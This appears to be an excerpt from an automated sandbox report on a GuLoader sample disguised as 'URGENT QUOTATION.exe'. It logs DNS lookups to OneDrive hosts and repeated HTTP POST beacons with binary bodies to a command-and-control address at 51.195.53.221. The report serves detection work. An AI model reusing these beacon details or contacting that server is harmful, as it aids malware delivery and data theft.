                  Feb 22, 2021 19:54:57.182136059 CET5309753192.168.2.48.8.8.8
                  Feb 22, 2021 19:54:57.235832930 CET53530978.8.8.8192.168.2.4
                  Feb 22, 2021 19:54:58.715600967 CET4925753192.168.2.48.8.8.8
                  Feb 22, 2021 19:54:58.766479969 CET53492578.8.8.8192.168.2.4
                  Feb 22, 2021 19:54:59.609208107 CET6238953192.168.2.48.8.8.8
                  Feb 22, 2021 19:54:59.674412012 CET53623898.8.8.8192.168.2.4
                  Feb 22, 2021 19:55:00.696815968 CET4991053192.168.2.48.8.8.8
                  Feb 22, 2021 19:55:00.745600939 CET53499108.8.8.8192.168.2.4
                  Feb 22, 2021 19:55:02.166680098 CET5585453192.168.2.48.8.8.8
                  Feb 22, 2021 19:55:02.220957994 CET53558548.8.8.8192.168.2.4
                  Feb 22, 2021 19:55:03.526134968 CET6454953192.168.2.48.8.8.8
                  Feb 22, 2021 19:55:03.577670097 CET53645498.8.8.8192.168.2.4
                  Feb 22, 2021 19:55:04.919903040 CET6315353192.168.2.48.8.8.8
                  Feb 22, 2021 19:55:04.968586922 CET53631538.8.8.8192.168.2.4
                  Feb 22, 2021 19:55:06.442466974 CET5299153192.168.2.48.8.8.8
                  Feb 22, 2021 19:55:06.490986109 CET53529918.8.8.8192.168.2.4
                  Feb 22, 2021 19:55:07.767831087 CET5370053192.168.2.48.8.8.8
                  Feb 22, 2021 19:55:07.827917099 CET53537008.8.8.8192.168.2.4
                  Feb 22, 2021 19:55:09.457597971 CET5172653192.168.2.48.8.8.8
                  Feb 22, 2021 19:55:09.509057045 CET53517268.8.8.8192.168.2.4
                  Feb 22, 2021 19:55:11.120012999 CET5679453192.168.2.48.8.8.8
                  Feb 22, 2021 19:55:11.168740988 CET53567948.8.8.8192.168.2.4
                  Feb 22, 2021 19:55:12.421596050 CET5653453192.168.2.48.8.8.8
                  Feb 22, 2021 19:55:12.470561981 CET53565348.8.8.8192.168.2.4
                  Feb 22, 2021 19:55:19.234452009 CET5662753192.168.2.48.8.8.8
                  Feb 22, 2021 19:55:19.285892010 CET53566278.8.8.8192.168.2.4
                  Feb 22, 2021 19:55:21.189466953 CET5662153192.168.2.48.8.8.8
                  Feb 22, 2021 19:55:21.247977972 CET53566218.8.8.8192.168.2.4
                  Feb 22, 2021 19:55:22.609910965 CET6311653192.168.2.48.8.8.8
                  Feb 22, 2021 19:55:22.658641100 CET53631168.8.8.8192.168.2.4
                  Feb 22, 2021 19:55:23.245244980 CET6407853192.168.2.48.8.8.8
                  Feb 22, 2021 19:55:23.296760082 CET53640788.8.8.8192.168.2.4
                  Feb 22, 2021 19:55:24.076570988 CET6480153192.168.2.48.8.8.8
                  Feb 22, 2021 19:55:24.157978058 CET53648018.8.8.8192.168.2.4
                  Feb 22, 2021 19:55:24.391375065 CET6172153192.168.2.48.8.8.8
                  Feb 22, 2021 19:55:24.440160036 CET53617218.8.8.8192.168.2.4
                  Feb 22, 2021 19:55:27.253577948 CET5125553192.168.2.48.8.8.8
                  Feb 22, 2021 19:55:27.305624008 CET53512558.8.8.8192.168.2.4
                  Feb 22, 2021 19:55:47.101993084 CET6152253192.168.2.48.8.8.8
                  Feb 22, 2021 19:55:47.153614998 CET53615228.8.8.8192.168.2.4
                  Feb 22, 2021 19:55:49.834748030 CET5233753192.168.2.48.8.8.8
                  Feb 22, 2021 19:55:49.897064924 CET53523378.8.8.8192.168.2.4
                  Feb 22, 2021 19:55:50.541276932 CET5504653192.168.2.48.8.8.8
                  Feb 22, 2021 19:55:50.591535091 CET53550468.8.8.8192.168.2.4
                  Feb 22, 2021 19:55:51.153666019 CET4961253192.168.2.48.8.8.8
                  Feb 22, 2021 19:55:51.210707903 CET53496128.8.8.8192.168.2.4
                  Feb 22, 2021 19:55:51.619370937 CET4928553192.168.2.48.8.8.8
                  Feb 22, 2021 19:55:51.679385900 CET53492858.8.8.8192.168.2.4
                  Feb 22, 2021 19:55:52.129781008 CET5060153192.168.2.48.8.8.8
                  Feb 22, 2021 19:55:53.115039110 CET5060153192.168.2.48.8.8.8
                  Feb 22, 2021 19:55:54.054042101 CET53506018.8.8.8192.168.2.4
                  Feb 22, 2021 19:55:54.056106091 CET53506018.8.8.8192.168.2.4
                  Feb 22, 2021 19:55:54.095179081 CET6087553192.168.2.48.8.8.8
                  Feb 22, 2021 19:55:54.178407907 CET53608758.8.8.8192.168.2.4
                  Feb 22, 2021 19:55:54.567998886 CET5644853192.168.2.48.8.8.8
                  Feb 22, 2021 19:55:54.628547907 CET53564488.8.8.8192.168.2.4
                  Feb 22, 2021 19:55:55.194668055 CET5917253192.168.2.48.8.8.8
                  Feb 22, 2021 19:55:55.252279043 CET53591728.8.8.8192.168.2.4
                  Feb 22, 2021 19:55:56.154933929 CET6242053192.168.2.48.8.8.8
                  Feb 22, 2021 19:55:56.214632034 CET53624208.8.8.8192.168.2.4
                  Feb 22, 2021 19:55:57.027703047 CET6057953192.168.2.48.8.8.8
                  Feb 22, 2021 19:55:57.077191114 CET53605798.8.8.8192.168.2.4
                  Feb 22, 2021 19:55:57.698741913 CET5018353192.168.2.48.8.8.8
                  Feb 22, 2021 19:55:57.759673119 CET53501838.8.8.8192.168.2.4
                  Feb 22, 2021 19:56:05.495182037 CET6153153192.168.2.48.8.8.8
                  Feb 22, 2021 19:56:05.543823004 CET53615318.8.8.8192.168.2.4
                  Feb 22, 2021 19:56:05.694511890 CET4922853192.168.2.48.8.8.8
                  Feb 22, 2021 19:56:05.760157108 CET53492288.8.8.8192.168.2.4
                  Feb 22, 2021 19:56:09.793924093 CET5979453192.168.2.48.8.8.8
                  Feb 22, 2021 19:56:09.852710962 CET53597948.8.8.8192.168.2.4
                  Feb 22, 2021 19:56:41.472836018 CET5591653192.168.2.48.8.8.8
                  Feb 22, 2021 19:56:41.521950960 CET53559168.8.8.8192.168.2.4
                  Feb 22, 2021 19:56:43.412163019 CET5275253192.168.2.48.8.8.8
                  Feb 22, 2021 19:56:43.473107100 CET53527528.8.8.8192.168.2.4

                  ICMP Packets

                  TimestampSource IPDest IPChecksumCodeType
                  Feb 22, 2021 19:55:54.056209087 CET192.168.2.48.8.8.8d0d1(Port unreachable)Destination Unreachable

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                  Feb 22, 2021 19:55:22.609910965 CET192.168.2.48.8.8.80xaa9fStandard query (0)onedrive.live.comA (IP address)IN (0x0001)
                  Feb 22, 2021 19:55:24.076570988 CET192.168.2.48.8.8.80x525fStandard query (0)gnpnew.by.files.1drv.comA (IP address)IN (0x0001)

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                  Feb 22, 2021 19:55:22.658641100 CET8.8.8.8192.168.2.40xaa9fNo error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                  Feb 22, 2021 19:55:24.157978058 CET8.8.8.8192.168.2.40x525fNo error (0)gnpnew.by.files.1drv.comby-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)
                  Feb 22, 2021 19:55:24.157978058 CET8.8.8.8192.168.2.40x525fNo error (0)by-files.fe.1drv.comodc-by-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)

                  HTTP Request Dependency Graph

                  • 51.195.53.221

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.2.44974351.195.53.22180C:\Users\user\Desktop\URGENT QUOTATION.exe
                  TimestampkBytes transferredDirectionData
                  Feb 22, 2021 19:55:26.030113935 CET2382OUTPOST /p.php/594QbwaP456AN HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 51.195.53.221
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 244CE878
                  Content-Length: 190
                  Connection: close
                  Feb 22, 2021 19:55:26.303994894 CET2382INHTTP/1.1 404 Not Found
                  Date: Mon, 22 Feb 2021 18:55:26 GMT
                  Server: Apache
                  Connection: close
                  Content-Type: text/html; charset=UTF-8


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  1192.168.2.44974451.195.53.22180C:\Users\user\Desktop\URGENT QUOTATION.exe
                  TimestampkBytes transferredDirectionData
                  Feb 22, 2021 19:55:26.532300949 CET2393OUTPOST /p.php/594QbwaP456AN HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 51.195.53.221
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 244CE878
                  Content-Length: 190
                  Connection: close
                  Feb 22, 2021 19:55:26.814730883 CET2394INHTTP/1.1 404 Not Found
                  Date: Mon, 22 Feb 2021 18:55:27 GMT
                  Server: Apache
                  Connection: close
                  Content-Type: text/html; charset=UTF-8


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  2192.168.2.44974551.195.53.22180C:\Users\user\Desktop\URGENT QUOTATION.exe
                  TimestampkBytes transferredDirectionData
                  Feb 22, 2021 19:55:26.968569040 CET2405OUTPOST /p.php/594QbwaP456AN HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 51.195.53.221
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 244CE878
                  Content-Length: 163
                  Connection: close
                  Feb 22, 2021 19:55:27.275238037 CET2406INHTTP/1.1 404 Not Found
                  Date: Mon, 22 Feb 2021 18:55:27 GMT
                  Server: Apache
                  Connection: close
                  Content-Type: text/html; charset=UTF-8


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  3192.168.2.44974851.195.53.22180C:\Users\user\Desktop\URGENT QUOTATION.exe
                  TimestampkBytes transferredDirectionData
                  Feb 22, 2021 19:55:27.547796965 CET2427OUTPOST /p.php/594QbwaP456AN HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 51.195.53.221
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 244CE878
                  Content-Length: 163
                  Connection: close
                  Feb 22, 2021 19:55:27.841558933 CET2440INHTTP/1.1 404 Not Found
                  Date: Mon, 22 Feb 2021 18:55:28 GMT
                  Server: Apache
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0d 0a 20 20
                  Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  4192.168.2.44974951.195.53.22180C:\Users\user\Desktop\URGENT QUOTATION.exe
                  TimestampkBytes transferredDirectionData
                  Feb 22, 2021 19:55:28.064709902 CET2450OUTPOST /p.php/594QbwaP456AN HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 51.195.53.221
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 244CE878
                  Content-Length: 163
                  Connection: close
                  Feb 22, 2021 19:55:28.371942997 CET2451INHTTP/1.1 404 Not Found
                  Date: Mon, 22 Feb 2021 18:55:28 GMT
                  Server: Apache
                  Connection: close
                  Content-Type: text/html; charset=UTF-8


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  5192.168.2.44975051.195.53.22180C:\Users\user\Desktop\URGENT QUOTATION.exe
                  TimestampkBytes transferredDirectionData
                  Feb 22, 2021 19:55:28.625081062 CET2462OUTPOST /p.php/594QbwaP456AN HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 51.195.53.221
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 244CE878
                  Content-Length: 163
                  Connection: close
                  Feb 22, 2021 19:55:28.941349030 CET2463INHTTP/1.1 404 Not Found
                  Date: Mon, 22 Feb 2021 18:55:29 GMT
                  Server: Apache
                  Connection: close
                  Content-Type: text/html; charset=UTF-8


                  Code Manipulations

                  Statistics

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Start time:19:55:00
                  Start date:22/02/2021
                  Path:C:\Users\user\Desktop\URGENT QUOTATION.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Users\user\Desktop\URGENT QUOTATION.exe'
                  Imagebase:0x400000
                  File size:135168 bytes
                  MD5 hash:B49C71BE94624173A9683580C792B195
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:Visual Basic
                  Reputation:low

                  General

                  Start time:19:55:11
                  Start date:22/02/2021
                  Path:C:\Users\user\Desktop\URGENT QUOTATION.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Users\user\Desktop\URGENT QUOTATION.exe'
                  Imagebase:0x400000
                  File size:135168 bytes
                  MD5 hash:B49C71BE94624173A9683580C792B195
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_GuLoader, Description: Yara detected GuLoader, Source: 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp, Author: Joe Security
                  Reputation:low

                  Disassembly

                  Code Analysis

                  Reset < >